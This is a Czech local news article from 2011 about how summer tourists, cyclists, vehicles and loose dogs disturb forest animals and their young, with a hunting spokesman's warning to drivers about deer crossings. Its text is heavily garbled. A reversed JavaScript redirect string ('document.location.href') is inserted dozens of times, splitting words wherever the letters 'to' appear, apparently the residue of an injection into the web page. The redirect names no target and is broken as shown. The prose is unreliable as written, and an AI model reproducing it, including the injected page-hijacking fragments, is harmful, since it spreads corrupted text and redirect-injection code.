Žďársko, zdarsko, aktuality, turistický ruch, zvěř
Rainbow page separator

Letní turistický ruch lesní zvěři nepřeje

Středa, 6. července 2011

Žďársko/ Letní prázdniny a s nimi i zvýšený ruch v lesních porostech a na loukách či polích neočekávají myslivci s velkým nadšením. V lesích se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž více než kdy jindy pohybují nejenom turisté, ale také cyklisté, houbaři, sběrači borůvek, běžci nebo v horších případech také jezdci na mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tocyklech, čtyřkolkách nebo řidiči au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů. Při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom příroda je v červenci plná mláďat. Ta sice již obvykle nejsou plně závislá na mateřském mléce a začínají konzumovat i běžnou potravu, přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale potřebují dostatek klidu. „Veřejnost by měla být citlivě upozorňována, že bezohledné chování v přírodě a volné pobíhání psů je v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to období pro volně žijící živočichy škodlivé,“ upozorňuje Jiří Šilha, tiskový mluvčí Českomoravské myslivecké jednoty.

V sedmý měsíc roku se již také projevuje teri[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toriální chování srnců, kteří si bedlivě střeží svoje „rajony“. „Silní teri[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toriální srnci srdnatě hájí svoje území, čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obchází jeho hranice, obnovují značení a vytrvale vyhání slabší srnce. V průběhu říje se také zvyšuje migrační aktivita srnčí zvěře. Upozornění je nutno adresovat obzvláště řidičům, kteří by měli být na silnicích obezřetní, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to především v lesních úsecích, kde dochází k častějším přechodům srnčí nebo i černé zvěře,“ dodal Jiří Šilha. Srážka se silným kňourem, srncem nebo jelenem může mít [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž pro šoféra fatální následky.